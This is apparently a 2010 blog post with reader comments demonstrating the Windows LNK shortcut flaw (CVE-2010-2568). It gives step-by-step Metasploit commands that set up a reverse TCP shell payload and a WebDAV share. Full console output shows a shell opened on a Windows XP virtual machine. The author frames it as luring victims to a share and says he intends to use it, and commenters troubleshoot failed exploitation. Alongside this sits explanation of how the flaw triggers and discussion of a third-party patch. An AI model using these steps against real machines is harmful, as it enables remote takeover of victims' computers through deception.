Ok, so with all the hype surrounding this vulnerability, I figured that I would do a write up and give an example of how it works. Metasploit, as usual, makes it really simple.
I really consider this to be a social engineering attack, because you need the victim to access a share. Yes, in the right circumstance, they’d stumble upon it themselves without any guidance, but generally this is going to be a “Hey man, check this out! ” style attack.
Anyway, lets start.
UPDATE
Here’s a video demonstrating the process as well. It’s essentially the same as what I’ve documented here, but it’s for those of you who prefer a visual writeup. 
You’ll have to view it in full-screen mode in order to really see what’s going on.
Windows LNK vulnerability (CVE-2010-2568) in action from hardez on Vimeo.
First things first, you’ll need the newest metasploit revision. If you already have metasploit installed, simply go in to the metasploit directory and type:
$ svn update
This will bring you up to the most current revision.
Next, start the console:
$ msfconsole
Then, choose the exploit module:
msf > use windows/browser/ms10_xxx_windows_shell_lnk_execute
Then choose the payload. I’m going to use a reverse_tcp shell..
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms10_xxx_windows_shell_lnk_execute) > show options
Module options:
Name Current Setting Required Description
—- ————— ——– ———–
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 80 yes The daemon port to listen on (do not change)
URIPATH / yes The URI to use (do not change).Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC process yes Exit technique: seh, thread, process
LHOST yes The listen address
LPORT 4444 yes The listen port
SRVHOST is going to be your local IP address
LHOST is also going to be your local IP address.. you don’t have to change anything else.
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set lhost 192.168.0.58
lhost => 192.168.0.58
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set srvhost 192.168.0.58
srvhost => 192.168.0.58
msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit
[*] Exploit running as background job.[*] Started reverse handler on 192.168.0.58:4444
[*]
[*] Send vulnerable clients to \\192.168.0.58\MSaq\
[*]
[*] Using URL: http://192.168.0.58:80/
[*] Server started.
msf exploit(ms10_xxx_windows_shell_lnk_execute) >
Ok, so now we have our server running. Now we want to get a user to browse to it. In my case, since this is just an example, I’ll browse to it myself from my vmware image, which is Windows XP SP2 and here’s what we see on the server side:
[*] Responding to WebDAV OPTIONS request from 192.168.0.252:1101
[*] Responding to WebDAV OPTIONS request from 192.168.0.252:1101
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq
[*] Sending 301 for /MSaq …
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq/
[*] Sending directory multistatus for /MSaq/ …
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq
[*] Sending 301 for /MSaq …
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq/
[*] Sending directory multistatus for /MSaq/ …
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq
[*] Sending 301 for /MSaq …
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq/
[*] Sending directory multistatus for /MSaq/ …
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq/desktop.ini
[*] Sending 404 for /MSaq/desktop.ini …
[*] Sending LNK file to 192.168.0.252:1101 …
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq/DXdrUxgc.dll.manifest
[*] Sending 404 for /MSaq/DXdrUxgc.dll.manifest …
[*] Sending DLL payload 192.168.0.252:1101 …
[*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq/DXdrUxgc.dll.123.Manifest
[*] Sending 404 for /MSaq/DXdrUxgc.dll.123.Manifest …
[*] Sending stage (240 bytes) to 192.168.0.252
[*] Command shell session 1 opened (192.168.0.58:4444 -> 192.168.0.252:1111) at Tue Jul 20 13:09:03 -0500 2010
sessionsActive sessions
===============Id Type Information Connection
— —- ———– ———-
1 shell 192.168.0.58:4444 -> 192.168.0.252:1111msf exploit(ms10_xxx_windows_shell_lnk_execute) > sessions -i 1
[*] Starting interaction with 1…Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.C:\Documents and Settings\Administrator>
Hard to get much simpler than that.
I’m intentionally not going into too much detail on how to make this more automated and how to obfuscate things as to not be so obvious to the end user, since I really don’t want to hand-hold ankle biters through the process of abusing it.
Anyway, there are a number of ways this could be used effectively in the field, but it requires a bit of creativity on the part of the attacker (I’m mainly talking about wireless networks). Is this effective? Definitely. Does it warrant raising infocon? Not in my opinion. I mean, look at all of the other exploits that target Windows that are totally remote, IE: enter an IP address and hit “exploit”. Those, in my opinion, are far more threatening than this.
All that said, though, I think this is going to be around for awhile and is going to definitely be a popular attack vector. I know I’m going to be using it.
If you enjoyed this post, make sure you subscribe to my RSS feed!
Also, if you think others would find this article useful, why not share it using the Share/Save button below? Thanks!
Related posts:
[...] Windows ‘LNK’ Exploit Demonstration | Attack Vector [...]
Is your write up incorrect? Shouldn’t it read?
msf > use exploit/windows/browser/ms10_xxx_windows_shell_lnk_execute
Sounds good, I read about this on astalavista.com in the mailing list section, guess you posted it to Full disclosure?
Anyhow, good explanation there, indeed the “media” seems to be overhiping it a bit.
Just thinking about attacks like this and others with users accessing links / IP that points to the metasploit box. Is the Link/Program/Exploit their side a handler as such or purely a pointer? If it is purely a pointer what is stopping you using an arp spoof twist and point any url to your metasploit box?
Yes it involves access to the network but there are ways and means, could this be used to exploit a box without user intervention?
Just a thought between things I am possibly far off the mark……
@Sie: No, it’s not just a pointer. It’s actually kind of an interesting vulnerability. It only gets executed when Windows renders the icon for a shortcut. I tried a bunch of different methods to get a Windows box to execute the exploit (ie: net use //whatever/whatever), but, as best I can tell, it needs to be opened in with explorer (not internet explorer, however, you can make it work that way, too).
@Larry: Yeah, I posted it to Full Disclosure because I hadn’t seen any other demo’s of the exploit, so I figured it was relevant. It was as close to spamming as I’m willing to go.
My first post I wrote about this was really, really bashing SANS for their hype of this. After playing with it for awhile and considering the impact this has, I laid off a bit, but I still don’t think they were justified in raising Infocon to yellow. I mean, I get where they’re coming from, but….
@null:
msf > search lnk
[*] Searching loaded modules for pattern ‘lnk’…
Exploits
========
Name Rank Description
—- —- ———–
windows/browser/ms10_xxx_windows_shell_lnk_execute excellent Microsoft Windows Shell LNK Code Execution
msf > use windows/browser/ms10_xxx_windows_shell_lnk_execute
msf exploit(ms10_xxx_windows_shell_lnk_execute) >
No leading “exploit” on my box. Is it different on yours?
@Sie: The other thing, is that you can put the .lnk file anywhere and it will execute, but I’m experiencing some problems with this at the moment. I took the .lnk file that was generated by metasploit and copied it to a USB key (as well as a regular directory on the C:\ drive of my vmware image) and it wouldn’t trigger until I right clicked on the file. I’m not quite sure why.
Cheers for that Matt. I hear it is linked to the rendering of the icon? Does this mean if you change the Icon for the LNK file it will become useless….
It appears this metasploit module doesnt work against Win 7 ultimate 32 bit with IE 8 and no success, it didnt get to the manifest file stage.XP Sp3 worked beautifully.
@Sie: Negative. When Windows tries to follow the shortcut to the program to find the icon in order to render it is when it gets executed. So, it doesn’t matter what the icon IS, just so long as Windows is told where to find it. Here are a few links to help understand it. Also, here is Microsoft’s official description:
“The vulnerability exists because Windows incorrectly parses shortcuts in such a way that malicious code may be executed when the icon of a specially crafted shortcut is displayed. This vulnerability can be exploited locally through a malicious USB drive, or remotely via network shares and WebDAV. An exploit can also be included in specific document types that support embedded shortcuts.”
http://www.stdlib.com/art6-Shortcut-File-Format-lnk.html
http://www.securityfocus.com/bid/41732
@dutchie86: Hmm.. interesting. Internet Explorer doesn’t really have anything to do with it, to be honest. Once you have the metasploit server running, open up file explorer and type in the address, it should get triggered. If you access the server via Internet Explorer, you should be asked to download a file. If you were to download it, it should get triggered.
Let me know what happens when you try access the share using file explorer.
[...] Windows ‘LNK’ Exploit Demonstration | Attack Vector [...]
[...] Windows ‘LNK’ Exploit Demonstration | Attack Vector [...]
Hi Matt, when opening the exploit path via explorer it opens the file share and everything is fine till
*] Received WebDAV PROPFIND request from 192.168.0.252:1101 /MSaq/desktop.ini
[*] Sending 404 for /MSaq/desktop.ini …
THen it just stops, no more traffic etc, I right click on .lnk file no exploit or manifest file is sent, click on the actual link and then starts the talk again from the begining except it it is for /MSaq/msaq.lnk/desktop.ini etc and no manifest file or stage 2 is sent. I tried changing the view to thumbnails etc to no avail.
@dutchie86: Weird dude.. I know that even Microsoft claims that it is vulnerable, but I don’t have a copy of Windows 7 around here to test it on. Maybe someone else will weigh in on the topic.
There is a patch for shell32.dll and it’s not made by Microsoft.
http://nemesis.te-home.net/News/20100723_Patch_for_0day__LNK_file_handling_vulnerability_up.html
@strcmp: Nice.. I hadn’t seen that yet. I guess I’d be a little apprehensive using something not provided by Microsoft, though.
i have no exploitation.
after running exploit and i can get a.dll and b.lnk
but no session established.
it stopped at Sending dll payload 192.168.1.16:1065….
windows xp sp2 + ie6.0
i wanna know why and anyone has the same result?
@elva: Unlike the video, try using explorer.exe rather than IE to access the share and see if it works.
[...] Windows ‘LNK’ Exploit Demonstration – attackvector.org [...]
“I guess I’d be a little apprehensive using something not provided by Microsoft”
The patch applies to OS’es no longer supported by Microsoft.
@strcmp: I get that.. but my concerns would be:
1) Who’s providing the patch?
2) Can the provider be trusted?
3) Do they provide the source code of the patch?
And, ultimately.. 4) Is this thing a backdoor?
To be honest, in most circumstances, I would say using a 3rd party patch to fix this problem might expose you to more risks than not patching it at all.
From nemesis.te-home.net:
“This program is a proof of concept and is provided “as is”. Any express or implied warranties are disclaimed. In no event shall the author be liable for any damages caused arising in any way out of the use of this software, even if advised of the possibility of such damage.
License: Creative Commons Attribution.”
After patching, the old shell32.dll is saved as “shell32.backup” in system32\ folder. If you compare shell32.dll with shell32.backup you can notice the patch is only 4 bytes for any Service Pack of Windows XP. Source code for this patch program is included.
If Microsoft no longer provides patches for OS’es that are still in use, we’ll see only 3rd party patches, if any.
@strcmp: Good point.. maybe it’s time for those who are tired of being jerked around by Microsoft to switch to a better operating system. Might I suggest Linux?